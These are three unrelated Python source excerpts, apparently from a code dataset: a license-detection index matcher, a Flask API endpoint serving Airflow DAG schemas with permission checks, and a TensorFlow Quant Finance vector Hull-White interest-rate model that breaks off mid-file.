########################################################################
self.digit_only_tids = intbitset([
i for i, s in enumerate(self.tokens_by_tid) if s.isdigit()])
# Create the tid -> token string lookup structure.
########################################################################
self.tokens_by_tid = tokens_by_tid = [
ts for ts, _tid in sorted(dictionary.items(), key=itemgetter(1))]
self.len_tokens = len_tokens = len(tokens_by_tid)
# Finalize automatons
########################################################################
self.negative_automaton.make_automaton()
self.rules_automaton.make_automaton()
if USE_AHO_FRAGMENTS:
self.fragments_automaton.make_automaton()
if USE_RULE_STARTS:
match_aho.finalize_starts(self.starts_automaton)
# OPTIMIZED: sparser dicts for faster lookup
sparsify(self.rid_by_hash)
########################################################################
# Do some sanity checks
########################################################################
msg = 'Inconsistent structure lengths'
assert len_tokens == highest_tid + 1 == len(dictionary), msg
msg = 'Cannot support more than licensedcode.index.MAX_TOKENS: %d' % MAX_TOKENS
assert len_tokens <= MAX_TOKENS, msg
dupe_rules = [rules for rules in dupe_rules_by_hash.values() if len(rules) > 1]
if dupe_rules:
dupe_rule_paths = [
'\n'.join(
sorted([
('file://' + rule.text_file)
if rule.text_file
else ('text: ' + rule.stored_text)
for rule in rules])
)
for rules in dupe_rules
]
msg = ('Duplicate rules: \n' + '\n\n'.join(dupe_rule_paths))
raise AssertionError(msg)
self.optimized = True
def debug_matches(self, matches, message, location=None, query_string=None,
with_text=False, qry=None):
"""
Log debug-level data for a list of `matches`.
"""
logger_debug(message + ':', len(matches))
if qry:
# set line early to ease debugging
match.set_lines(matches, qry.line_by_pos)
if not with_text:
for m in matches:
logger_debug(m)
else:
logger_debug(message + ' MATCHED TEXTS')
from licensedcode.tracing import get_texts
for m in matches:
logger_debug(m)
qt, it = get_texts(m)
print(' MATCHED QUERY TEXT:', qt)
print(' MATCHED RULE TEXT:', it)
print()
def get_spdx_id_matches(self, query, from_spdx_id_lines=True, **kwargs):
"""
Matching strategy for SPDX-Licensed-Identifier style of expressions. If
`from_spdx_id_lines` is True detect only in the SPDX license identifier
lines found in the query. Otherwise use the whole query for detection.
"""
matches = []
if from_spdx_id_lines:
qrs_and_texts = query.spdx_lid_query_runs_and_text()
else:
# If we are not specifically looking at a single SPDX-Licene-
# identifier line, then use the whole query run with the whole text.
# Note this can only work for small texts or this will likely make
# the expression parser choke if you feed it large texts
query_lines = [ln for _, ln
in tokenize.query_lines(query.location, query.query_string)]
qrs_and_texts = query.whole_query_run(), u'\n'.join(query_lines)
qrs_and_texts = [qrs_and_texts]
for query_run, detectable_text in qrs_and_texts:
if not query_run.matchables:
# this could happen if there was some negative match applied
continue
spdx_match = match_spdx_lid.spdx_id_match(
self, query_run, detectable_text)
query_run.subtract(spdx_match.qspan)
matches.append(spdx_match)
return matches
def get_exact_matches(self, query, deadline=sys.maxsize, **kwargs):
"""
Extract matching strategy using an automaton for multimatching at once.
"""
wqr = query.whole_query_run()
matches = match_aho.exact_match(self, wqr, self.rules_automaton, deadline=deadline)
matches, _discarded = match.refine_matches(matches, self,
query=query, filter_false_positive=False, merge=False)
return matches
def get_fragments_matches(self, query, matched_qspans, deadline=sys.maxsize, **kwargs):
"""
Approximate matching strategy breaking a query in query_runs and using
fragment matching. Return a list of matches.
"""
matches = []
for query_run in query.query_runs:
# we cannot do a sequence match in query run without some high token left
if not query_run.is_matchable(include_low=False, qspans=matched_qspans):
continue
qrun_matches = match_aho.match_fragments(self, query_run)
matches.extend(match.merge_matches(qrun_matches))
# break if deadline has passed
if time() > deadline:
break
return matches
def get_approximate_matches(self, query, matched_qspans, existing_matches,
deadline=sys.maxsize, **kwargs):
"""
Approximate matching strategy breaking a query in query_runs and using
multiple local alignments (aka. diff). Return a list of matches.
"""
matches = []
matchable_rids = self.approx_matchable_rids
already_matched_qspans = matched_qspans[:]
MAX_NEAR_DUPE_CANDIDATES = 10
# first check if the whole file may be close, near-dupe match
whole_query_run = query.whole_query_run()
near_dupe_candidates = match_set.compute_candidates(
query_run=whole_query_run,
idx=self,
matchable_rids=matchable_rids,
top=MAX_NEAR_DUPE_CANDIDATES,
high_resemblance=True,
_use_bigrams=USE_BIGRAM_MULTISETS)
# if near duplicates, we only match the whole file at once against these
# candidates
if near_dupe_candidates:
if TRACE_APPROX_CANDIDATES:
logger_debug('get_query_run_approximate_matches: near dupe candidates:')
for rank, ((sv1, sv2), _rid, can, _inter) in enumerate(near_dupe_candidates, 1):
print(rank, sv1, sv2, can.identifier)
matched = self.get_query_run_approximate_matches(
whole_query_run, near_dupe_candidates, already_matched_qspans, deadline)
matches.extend(matched)
# subtract these
for match in matched:
qspan = match.qspan
query.subtract(qspan)
already_matched_qspans.append(qspan)
# break if deadline has passed
if time() > deadline:
return matches
# otherwise, and in all cases we break things in smaller query runs and
# match each separately
if USE_RULE_STARTS:
query.refine_runs()
if TRACE_APPROX:
logger_debug('get_approximate_matches: len(query.query_runs):', len(query.query_runs))
MAX_CANDIDATES = 70
for query_run in query.query_runs:
# inverted index match and ranking, query run-level
candidates = match_set.compute_candidates(
query_run=query_run,
idx=self,
matchable_rids=matchable_rids,
top=MAX_CANDIDATES,
high_resemblance=False,
_use_bigrams=USE_BIGRAM_MULTISETS)
if TRACE_APPROX_CANDIDATES:
logger_debug('get_query_run_approximate_matches: candidates:')
for rank, ((sv1, sv2), _rid, can, _inter) in enumerate(candidates, 1):
print(rank, sv1, sv2, can.identifier)
matched = self.get_query_run_approximate_matches(
query_run, candidates, matched_qspans, deadline)
matches.extend(matched)
# break if deadline has passed
if time() > deadline:
break
return matches
def get_query_run_approximate_matches(self, query_run, candidates,
matched_qspans, deadline=sys.maxsize, **kwargs):
"""
Return Return a list of approximate matches for a single query run.
"""
matches = []
# we cannot do a sequence match in query run without some high token left
if not query_run.is_matchable(include_low=False, qspans=matched_qspans):
if TRACE_APPROX:
logger_debug(
'get_query_run_approximate_matches: query_run not matchable:', query_run)
return matches
# Perform multiple sequence matching/alignment for each candidate,
# query run-level for as long as we have more non-overlapping
# matches returned
for _score_vecs, rid, candidate_rule, high_intersection in candidates:
if USE_DMP:
# Myers diff works best when the difference are small, otherwise
# it performs rather poorly as it is not aware of legalese
match_blocks = match_blocks_dmp
high_postings = None
else:
# we prefer to use the high tken aware seq matching only
# when the matches are not clear. it works best when things
# are farther apart
match_blocks = match_blocks_seq
high_postings = self.high_postings_by_rid[rid]
high_postings = {
tid: postings for tid, postings in high_postings.items()
if tid in high_intersection}
start_offset = 0
while True:
rule_matches = match_seq.match_sequence(
self, candidate_rule, query_run,
high_postings=high_postings,
start_offset=start_offset,
match_blocks=match_blocks)
if TRACE_APPROX_MATCHES:
self.debug_matches(
matches=rule_matches, message='get_query_run_approximate_matches: rule_matches:',
with_text=True, qry=query_run.query)
if not rule_matches:
break
matches_end = max(m.qend for m in rule_matches)
matches.extend(rule_matches)
if matches_end + 1 < query_run.end:
start_offset = matches_end + 1
continue
else:
break
# break if deadline has passed
if time() > deadline:
break
# break if deadline has passed
if time() > deadline:
break
# FIXME: is this really needed here?
matches = match.merge_matches(matches)
return matches
def match(self, location=None, query_string=None, min_score=0,
as_expression=False, deadline=sys.maxsize, _skip_hash_match=False,
**kwargs):
"""
This is the main entry point to match licenses.
Return a sequence of LicenseMatch by matching the file at `location` or
the `query_string` text against the index. Only include matches with
scores greater or equal to `min_score`.
If `as_expression` is True, treat the whole text as a single SPDX
license expression and use only expression matching.
`deadline` is a time.time() value in seconds by which the processing should stop
and return whatever was matched so far.
`_skip_hash_match` is used only for testing.
"""
assert 0 <= min_score <= 100
if not location and not query_string:
return []
qry = query.build_query(location, query_string, idx=self,
text_line_threshold=15, bin_line_threshold=50)
if not qry:
return []
whole_query_run = qry.whole_query_run()
if not whole_query_run or not whole_query_run.matchables:
return []
if not _skip_hash_match:
matches = match_hash.hash_match(self, whole_query_run)
if matches:
match.set_lines(matches, qry.line_by_pos)
return matches
# TODO: add match to degenerated expressions with custom symbols
if as_expression:
matches = self.get_spdx_id_matches(qry, from_spdx_id_lines=False)
match.set_lines(matches, qry.line_by_pos)
return matches
negative_matches = []
if self.negative_rids:
negative_matches = self.negative_match(whole_query_run)
for neg in negative_matches:
whole_query_run.subtract(neg.qspan)
if TRACE_NEGATIVE:
self.debug_matches(
matches=negative_matches, message='negative_matches',
location=location, query_string=query_string) # , with_text, query)
matches = []
if USE_AHO_FRAGMENTS:
approx = self.get_fragments_matches
else:
approx = self.get_approximate_matches
matchers = [
# matcher, include_low in post-matching remaining matchable check
(self.get_spdx_id_matches, True, 'spdx_lid'),
(self.get_exact_matches, False, 'aho'),
(approx, False, 'seq'),
]
already_matched_qspans = []
for matcher, include_low, matcher_name in matchers:
if TRACE:
logger_debug()
logger_debug('matching with matcher:', matcher_name)
matched = matcher(qry, matched_qspans=already_matched_qspans,
existing_matches=matches, deadline=deadline)
if TRACE:
self.debug_matches(
matches=matched, message='matched with: ' + matcher_name,
location=location, query_string=query_string) # , with_text, query)
matched = match.merge_matches(matched)
matches.extend(matched)
# subtract whole text matched if this is long enough
for m in matched:
if m.rule.is_license_text and m.rule.length > 120 and m.coverage() > 98:
qry.subtract(m.qspan)
# check if we have some matchable left
# do not match futher if we do not need to
# collect qspans matched exactly e.g. with coverage 100%
# this coverage check is because we have provision to match fragments (unused for now)
already_matched_qspans.extend(m.qspan for m in matched if m.coverage() == 100)
if not whole_query_run.is_matchable(
include_low=include_low, qspans=already_matched_qspans):
break
# break if deadline has passed
if time() > deadline:
break
if not matches:
return []
if TRACE:
logger_debug()
self.debug_matches(matches=matches, message='matches before final merge',
location=location, query_string=query_string,
with_text=True, qry=qry)
matches, _discarded = match.refine_matches(
matches, idx=self, query=qry, min_score=min_score,
max_dist=MAX_DIST // 2, filter_false_positive=True, merge=True)
matches.sort()
match.set_lines(matches, qry.line_by_pos)
if TRACE:
print()
self.debug_matches(matches=matches, message='final matches',
location=location, query_string=query_string ,
with_text=True, qry=qry)
return matches
def negative_match(self, query_run):
"""
Match a query run exactly against negative rules. Return a list
of negative LicenseMatch for a query run, subtract these matches
from the query run.
"""
return match_aho.exact_match(self, query_run, self.negative_automaton)
def _print_index_stats(self):
"""
Print internal Index structures stats. Used for debugging and testing.
"""
try:
from pympler.asizeof import asizeof as size_of
except ImportError:
print('Index statistics will be approximate: `pip install pympler` for correct structure sizes')
from sys import getsizeof as size_of
fields = (
'dictionary',
'tokens_by_tid',
'rid_by_hash',
'rules_by_rid',
'tids_by_rid',
'sets_by_rid',
'msets_by_rid',
'regular_rids',
'negative_rids',
'approx_matchable_rids',
'false_positive_rids',
)
plen = max(map(len, fields)) + 1
internal_structures = [s + (' ' * (plen - len(s))) for s in fields]
print('Index statistics:')
total_size = 0
for struct_name in internal_structures:
struct = getattr(self, struct_name.strip())
try:
print(' ', struct_name, ':', 'length :', len(struct))
except:
print(' ', struct_name, ':', 'repr :', repr(struct))
siz = size_of(struct)
total_size += siz
print(' ', struct_name, ':', 'size in MB:', round(siz / (1024 * 1024), 2))
print(' TOTAL internals in MB:', round(total_size / (1024 * 1024), 2))
print(' TOTAL real size in MB:', round(size_of(self) / (1024 * 1024), 2))
def _tokens2text(self, tokens):
"""
Return a text string from a sequence of token ids.
Used for tracing and debugging.
"""
return u' '.join('None' if t is None else self.tokens_by_tid[t] for t in tokens)
@staticmethod
def loads(saved, fast=True):
"""
Return a LicenseIndex from a pickled string.
"""
pickler = cPickle if fast else pickle
idx = pickler.loads(saved)
# perform some optimizations on the dictionaries
sparsify(idx.dictionary)
return idx
@staticmethod
def load(fn, fast=True):
"""
Return a LicenseIndex loaded from the `fn` file-like object pickled index.
"""
pickler = cPickle if fast else pickle
idx = pickler.load(fn)
# perform some optimizations on the dictionaries
sparsify(idx.dictionary)
return idx
def dumps(self, fast=True):
"""
Return a pickled string of self.
"""
# here cPickle fails when we load it back. Pickle is slower to write but
# works when we read with cPickle :|
pickler = cPickle if fast else pickle
pickled = pickler.dumps(self, protocol=cPickle.HIGHEST_PROTOCOL)
# NB: this is making the usage of cPickle possible... as a weird workaround.
# the gain from dumping using cPickle is not as big with this optimize
# but still much faster than using the plain pickle module
# TODO: revisit me after the Python3 port
import pickletools
pickletools.code2op = sparsify(pickletools.code2op)
pickled = pickletools.optimize(pickled)
return pickled
def dump(self, fn, fast=False):
"""
Dump (write) a pickled self to the `fn` file-like object.
"""
# here cPickle fails when we load it back. Pickle is slower to write but
# works when we read with cPickle :|
pickler = cPickle if fast else pickle
return pickler.dump(self, fn, protocol=cPickle.HIGHEST_PROTOCOL)
def get_weak_rids(len_legalese, tids_by_rid, _idx):
"""
Return a set of "weak" rule ids made entirely of junk tokens: they can only
be matched using an automaton.
"""
weak_rids = set()
weak_rids_add = weak_rids.add
for rid, tids in enumerate(tids_by_rid):
if any(t < len_legalese for t in tids):
continue
weak_rids_add(rid)
if TRACE :
for rid in sorted(weak_rids):
rule = _idx.rules_by_rid[rid]
if not rule.is_negative:
message = (
'WARNING: Weak rule, made only of frequent junk tokens. '
'Can only be matched exactly:',
_idx.rules_by_rid[rid].identifier,
u' '.join(_idx.tokens_by_tid[t] for t in tids))
logger_debug(u' '.join(message))
return weak_rids
def get_matched_rule_ids(matches, query_run):
"""
Yield the subset of matched rule ids from a `matches` LicenseMatch
sequence that are within the `query_run` query run.
"""
qstart = query_run.start
qend = query_run.end
for match in matches:
if qstart <= match.qstart and match.qend <= qend:
yield match.rule.rid
|
the-stack_0_6111 | """
Endpoints to get the schemas
"""
# Import from libraries
from cornflow_client.airflow.api import Airflow
from flask import current_app, request
from flask_apispec import marshal_with, doc
import logging as log
from cornflow_core.authentication import authenticate
# Import from internal modules
from ..models import PermissionsDAG
from ..shared.authentication import Auth
from cornflow_core.exceptions import AirflowError, NoPermission
from ..schemas.schemas import SchemaOneApp, SchemaListApp
from cornflow_core.resources import BaseMetaResource
from ..shared.const import ALL_DEFAULT_ROLES
class SchemaEndpoint(BaseMetaResource):
"""
Endpoint used to obtain names of available apps
"""
ROLES_WITH_ACCESS = ALL_DEFAULT_ROLES
@doc(description="Get list of available apps", tags=["Schemas"])
@authenticate(auth_class=Auth())
@marshal_with(SchemaListApp(many=True))
def get(self):
"""
API method to get a list of dag names
:return: A dictionary with a message and a integer with the HTTP status code
:rtype: Tuple(dict, integer)
"""
user = Auth().get_user_from_header(request.headers)
dags = PermissionsDAG.get_user_dag_permissions(user.id)
available_dags = [{"name": dag.dag_id} for dag in dags]
log.info("User gets list of schema")
return available_dags
class SchemaDetailsEndpoint(BaseMetaResource):
"""
Endpoint used to obtain schemas for one app
"""
ROLES_WITH_ACCESS = ALL_DEFAULT_ROLES
@doc(description="Get instance, solution and config schema", tags=["Schemas"])
@authenticate(auth_class=Auth())
@marshal_with(SchemaOneApp)
def get(self, dag_name):
"""
API method to get the input, output and config schemas for a given dag
:return: A dictionary with a message and a integer with the HTTP status code
:rtype: Tuple(dict, integer)
"""
user = Auth().get_user_from_header(request.headers)
permission = PermissionsDAG.check_if_has_permissions(
user_id=user.id, dag_id=dag_name
)
if permission:
af_client = Airflow.from_config(current_app.config)
if not af_client.is_alive():
log.error(
"Airflow not accessible when getting schema {}".format(dag_name)
)
raise AirflowError(error="Airflow is not accessible")
# try airflow and see if dag_name exists
af_client.get_dag_info(dag_name)
log.info("User gets schema {}".format(dag_name))
# it exists: we try to get its schemas
return af_client.get_schemas_for_dag_name(dag_name)
else:
raise NoPermission(
error="User does not have permission to access this dag",
status_code=403,
)
|
the-stack_0_6113 | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Vector of correlated Hull-White models with time-dependent parameters."""
import tensorflow.compat.v2 as tf
from tf_quant_finance.math import gradient
from tf_quant_finance.math import piecewise
from tf_quant_finance.math import random_ops as random
from tf_quant_finance.models import euler_sampling
from tf_quant_finance.models import generic_ito_process
from tf_quant_finance.models import utils
class VectorHullWhiteModel(generic_ito_process.GenericItoProcess):
r"""Ensemble of correlated Hull-White Models.
Represents the Ito process:
```None
dr_i(t) = (theta_i(t) - a_i(t) * r_i(t)) dt + sigma_i(t) * dW_{r_i}(t),
1 <= i <= n,
```
where `W_{r_i}` are 1D Brownian motions with a correlation matrix `Rho(t)`.
For each `i`, `r_i` is the Hull-White process.
`theta_i`, `a_i`, `sigma_i`, `Rho` are positive functions of time.
`a_i` correspond to the mean-reversion rate, `sigma_i` is the volatility of
the process, `theta_i(t)` is the function that determines long run behaviour
of the process `r(t) = (r_1(t), ..., r_n(t))`
and is computed to match the initial (at t=0) discount curve:
```None
\theta_i = df_i(t) / dt + a_i * f_i(t) + 0.5 * sigma_i**2 / a_i
* (1 - exp(-2 * a_i *t)), 1 <= i <= n
```
where `f_i(t)` is the instantaneous forward rate at time `0` for a maturity
`t` and `df_i(t)/dt` is the gradient of `f_i` with respect to the maturity.
See Section 3.3.1 of [1] for details.
The price at time `t` of a zero-coupon bond maturing at `T` is given by
(Ref. [2]):
```None
P(t,T) = P(0,T) / P(0,t) *
exp(-(r(t) - f(0,t)) * G(t,T) - 0.5 * y(t) * G(t,T)^2)
y(t) = int_0^t [exp(-2 int_u^t (a(s) ds)) sigma(u)^2 du]
G(t,T) = int_t^T [exp(-int_t^u a(s) ds) du]
```
If mean-reversion, `a_i`, is constant and the volatility (`sigma_i`), and
correlation (`Rho`) are piecewise constant functions, the process is sampled
exactly. Otherwise, Euler sampling is used.
For `n=1` this class represents Hull-White Model (see
tff.models.hull_white.HullWhiteModel1F).
#### Example. Two correlated Hull-White processes.
```python
import numpy as np
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
dtype = tf.float64
# Mean-reversion is constant for the two processes. `mean_reversion(t)`
# has shape `[dim] + t.shape`.
mean_reversion = [0.03, 0.02]
# Volatility is a piecewise constant function with jumps at the same locations
# for both Hull-White processes. `volatility(t)` has shape `[dim] + t.shape`.
volatility = tff.math.piecewise.PiecewiseConstantFunc(
jump_locations=[[0.1, 2.], [0.1, 2.]],
values=[[0.01, 0.02, 0.01], [0.01, 0.015, 0.01]],
dtype=dtype)
# Correlation matrix is constant
corr_matrix = [[1., 0.1], [0.1, 1.]]
initial_discount_rate_fn = lambda *args: [0.01, 0.015]
process = tff.models.hull_white.VectorHullWhiteModel(
dim=2, mean_reversion=mean_reversion,
volatility=volatility,
initial_discount_rate_fn=initial_discount_rate_fn,
corr_matrix=corr_matrix,
dtype=dtype)
# Sample 10000 paths using Sobol numbers as a random type.
times = np.linspace(0., 1.0, 10)
num_samples = 10000 # number of trajectories
paths = process.sample_paths(
times,
num_samples=num_samples,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[4, 2])
# Compute mean for each Hull-White process at the terminal value
tf.math.reduce_mean(paths[:, -1, :], axis=0)
# Expected value: [0.01013373 0.01494516]
```
#### References:
[1]: D. Brigo, F. Mercurio. Interest Rate Models. 2007.
[2]: Leif B. G. Andersen and Vladimir V. Piterbarg. Interest Rate Modeling.
Volume II: Term Structure Models.
"""
def __init__(self,
dim,
mean_reversion,
volatility,
initial_discount_rate_fn,
corr_matrix=None,
dtype=None,
name=None):
"""Initializes the Correlated Hull-White Model.
Args:
dim: A Python scalar which corresponds to the number of correlated
Hull-White Models.
mean_reversion: A real positive `Tensor` of shape `[dim]` or a Python
callable. The callable can be one of the following:
(a) A left-continuous piecewise constant object (e.g.,
`tff.math.piecewise.PiecewiseConstantFunc`) that has a property
`is_piecewise_constant` set to `True`. In this case the object
should have a method `jump_locations(self)` that returns a
`Tensor` of shape `[dim, num_jumps]` or `[num_jumps]`
In the first case, `mean_reversion(t)` should return a `Tensor`
of shape `[dim] + t.shape`, and in the second, `t.shape + [dim]`,
where `t` is a rank 1 `Tensor` of the same `dtype` as the output.
See example in the class docstring.
(b) A callable that accepts scalars (stands for time `t`) and returns a
`Tensor` of shape `[dim]`.
Corresponds to the mean reversion rate.
volatility: A real positive `Tensor` of the same `dtype` as
`mean_reversion` or a callable with the same specs as above.
Corresponds to the lond run price variance.
initial_discount_rate_fn: A Python callable that accepts expiry time as
a real `Tensor` of the same `dtype` as `mean_reversion` and returns a
`Tensor` of shape `input_shape + dim`.
Corresponds to the zero coupon bond yield at the present time for the
input expiry time.
corr_matrix: A `Tensor` of shape `[dim, dim]` and the same `dtype` as
`mean_reversion` or a Python callable. The callable can be one of
the following:
(a) A left-continuous piecewise constant object (e.g.,
`tff.math.piecewise.PiecewiseConstantFunc`) that has a property
`is_piecewise_constant` set to `True`. In this case the object
should have a method `jump_locations(self)` that returns a
`Tensor` of shape `[num_jumps]`. `corr_matrix(t)` should return a
`Tensor` of shape `t.shape + [dim]`, where `t` is a rank 1 `Tensor`
of the same `dtype` as the output.
(b) A callable that accepts scalars (stands for time `t`) and returns a
`Tensor` of shape `[dim, dim]`.
Corresponds to the correlation matrix `Rho`.
dtype: The default dtype to use when converting values to `Tensor`s.
Default value: `None` which means that default dtypes inferred by
TensorFlow are used.
name: Python string. The name to give to the ops created by this class.
Default value: `None` which maps to the default name `hull_white_model`.
Raises:
ValueError:
(a) If either `mean_reversion`, `volatility`, or `corr_matrix` is
a piecewise constant function where `jump_locations` have batch shape
of rank > 1.
(b): If batch rank of the `jump_locations` is `[n]` with `n` different
from `dim`.
"""
self._name = name or 'hull_white_model'
with tf.name_scope(self._name):
self._dtype = dtype or None
# If the parameter is callable but not a piecewise constant use
# generic sampling method (e.g., Euler).
self._sample_with_generic = False
def _instant_forward_rate_fn(t):
t = tf.convert_to_tensor(t, dtype=self._dtype)
def _log_zero_coupon_bond(x):
r = tf.convert_to_tensor(
initial_discount_rate_fn(x), dtype=self._dtype)
return -r * x
rate = -gradient.fwd_gradient(
_log_zero_coupon_bond, t, use_gradient_tape=True,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
return rate
def _initial_discount_rate_fn(t):
return tf.convert_to_tensor(
initial_discount_rate_fn(t), dtype=self._dtype)
self._instant_forward_rate_fn = _instant_forward_rate_fn
self._initial_discount_rate_fn = _initial_discount_rate_fn
self._mean_reversion, sample_with_generic = _input_type(
mean_reversion, dim=dim, dtype=dtype, name='mean_reversion')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
# Get the volatility type
self._volatility, sample_with_generic = _input_type(
volatility, dim=dim, dtype=dtype, name='volatility')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
if corr_matrix is not None:
# Get correlation matrix type
self._corr_matrix, sample_with_generic = _input_type(
corr_matrix, dim=dim, dtype=dtype, name='corr_matrix')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
else:
self._corr_matrix = None
if not self._sample_with_generic:
self._exact_discretization_setup(dim)
# Volatility function
def _vol_fn(t, x):
"""Volatility function of correlated Hull-White."""
# Get parameter values at time `t`
volatility = _get_parameters(tf.expand_dims(t, -1), self._volatility)[0]
volatility = tf.transpose(volatility)
if self._corr_matrix is not None:
corr_matrix = _get_parameters(tf.expand_dims(t, -1), self._corr_matrix)
corr_matrix = corr_matrix[0]
corr_matrix = tf.linalg.cholesky(corr_matrix)
else:
corr_matrix = tf.eye(self._dim, dtype=volatility.dtype)
return volatility * corr_matrix + tf.zeros(
x.shape.as_list()[:-1] + [self._dim, self._dim],
dtype=volatility.dtype)
# Drift function
def _drift_fn(t, x):
"""Drift function of correlated Hull-White."""
# Get parameter values at time `t`
mean_reversion, volatility = _get_parameters( # pylint: disable=unbalanced-tuple-unpacking
tf.expand_dims(t, -1), self._mean_reversion, self._volatility)
fwd_rates = self._instant_forward_rate_fn(t)
fwd_rates_grad = gradient.fwd_gradient(
self._instant_forward_rate_fn, t, use_gradient_tape=True,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
drift = fwd_rates_grad + mean_reversion * fwd_rates
drift += (volatility**2 / 2 / mean_reversion
* (1 - tf.math.exp(-2 * mean_reversion * t))
- mean_reversion * x)
return drift
super(VectorHullWhiteModel, self).__init__(dim, _drift_fn, _vol_fn,
dtype, name)
@property
def mean_reversion(self):
return self._mean_reversion
@property
def volatility(self):
return self._volatility
def sample_paths(self,
times,
num_samples=1,
random_type=None,
seed=None,
skip=0,
time_step=None,
name=None):
"""Returns a sample of paths from the correlated Hull-White process.
Uses exact sampling if `self.mean_reversion` is constant and
`self.volatility` and `self.corr_matrix` are all `Tensor`s or piecewise
constant functions, and Euler scheme sampling otherwise.
The exact sampling implements the algorithm and notations in [1], section
10.1.6.1.
Args:
times: Rank 1 `Tensor` of positive real values. The times at which the
path points are to be evaluated.
num_samples: Positive scalar `int32` `Tensor`. The number of paths to
draw.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: `None` which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
`HALTON_RANDOMIZED` the seed should be an Python integer. For
`STATELESS` and `STATELESS_ANTITHETIC `must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
time_step: Scalar real `Tensor`. Maximal distance between time grid points
in Euler scheme. Used only when Euler scheme is applied.
Default value: `None`.
name: Python string. The name to give this op.
Default value: `sample_paths`.
Returns:
A `Tensor` of shape [num_samples, k, dim] where `k` is the size
of the `times` and `dim` is the dimension of the process.
Raises:
ValueError:
(a) If `times` has rank different from `1`.
(b) If Euler scheme is used by times is not supplied.
"""
# Note: all the notations below are the same as in [2].
name = name or self._name + '_sample_path'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, self._dtype)
if len(times.shape) != 1:
raise ValueError('`times` should be a rank 1 Tensor. '
'Rank is {} instead.'.format(len(times.shape)))
if self._sample_with_generic:
if time_step is None:
raise ValueError('`time_step` can not be `None` when at least one of '
'the parameters is a generic callable.')
initial_state = self._instant_forward_rate_fn(0.0)
return euler_sampling.sample(dim=self._dim,
drift_fn=self._drift_fn,
volatility_fn=self._volatility_fn,
times=times,
time_step=time_step,
num_samples=num_samples,
initial_state=initial_state,
random_type=random_type,
seed=seed,
skip=skip,
dtype=self._dtype)
return self._sample_paths(
times, num_samples, random_type, skip, seed)
def sample_discount_curve_paths(self,
times,
curve_times,
num_samples=1,
random_type=None,
seed=None,
skip=0,
name=None):
"""Returns a sample of simulated discount curves for the Hull-white model.
Args:
times: Rank 1 `Tensor` of positive real values. The times at which the
discount curves are to be evaluated.
curve_times: Rank 1 `Tensor` of positive real values. The maturities
at which discount curve is computed at each simulation time.
num_samples: Positive scalar `int`. The number of paths to draw.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: None which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
`HALTON_RANDOMIZED` the seed should be an Python integer. For
`STATELESS` and `STATELESS_ANTITHETIC` must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
name: Str. The name to give this op.
Default value: `sample_discount_curve_paths`.
Returns:
A tuple containing two `Tensor`s. The first element is a `Tensor` of
shape [num_samples, m, k, dim] and contains the simulated bond curves
where `m` is the size of `curve_times`, `k` is the size of `times` and
`dim` is the dimension of the process. The second element is a `Tensor`
of shape [num_samples, k, dim] and contains the simulated short rate
paths.
### References:
[1]: Leif B.G. Andersen and Vladimir V. Piterbarg. Interest Rate Modeling,
Volume II: Term Structure Models. 2010.
"""
name = name or self._name + '_sample_discount_curve_paths'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, self._dtype)
curve_times = tf.convert_to_tensor(curve_times, self._dtype)
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
y_t = self._compute_yt(times, mean_reversion, volatility)
rate_paths = self._sample_paths(
times, num_samples, random_type, skip, seed)
short_rate = tf.expand_dims(rate_paths, axis=1)
# Reshape all `Tensor`s so that they have the dimensions same as (or
# broadcastable to) the output shape
# ([num_smaples,num_curve_times,num_sim_times,dim]).
num_curve_nodes = curve_times.shape.as_list()[0] # m
num_sim_steps = times.shape.as_list()[0] # k
times = tf.reshape(
tf.repeat(tf.expand_dims(times, axis=-1), self._dim, axis=-1),
(1, 1, num_sim_steps, self._dim))
curve_times = tf.reshape(curve_times, (1, num_curve_nodes, 1, 1))
curve_times = tf.repeat(curve_times, self._dim, axis=-1)
mean_reversion = tf.reshape(
mean_reversion, (1, 1, self._dim, num_sim_steps))
# Transpose so the `dim` is the trailing dimension.
mean_reversion = tf.transpose(mean_reversion, [0, 1, 3, 2])
# Calculate the variable `y(t)` (described in [1], section 10.1.6.1)
# so that we have the full Markovian state to compute the P(t,T).
y_t = tf.reshape(tf.transpose(y_t), (1, 1, num_sim_steps, self._dim))
return self._bond_reconstitution(times, times + curve_times,
mean_reversion, short_rate,
y_t), rate_paths
def discount_bond_price(self, short_rate, times, maturities, name=None):
